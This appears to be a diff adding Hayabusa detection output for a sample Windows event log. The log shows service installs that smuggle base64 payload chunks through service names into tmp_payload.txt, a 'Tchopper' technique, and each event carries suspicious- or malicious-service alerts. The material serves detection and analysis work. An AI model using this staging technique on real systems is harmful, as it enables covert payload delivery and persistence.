+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
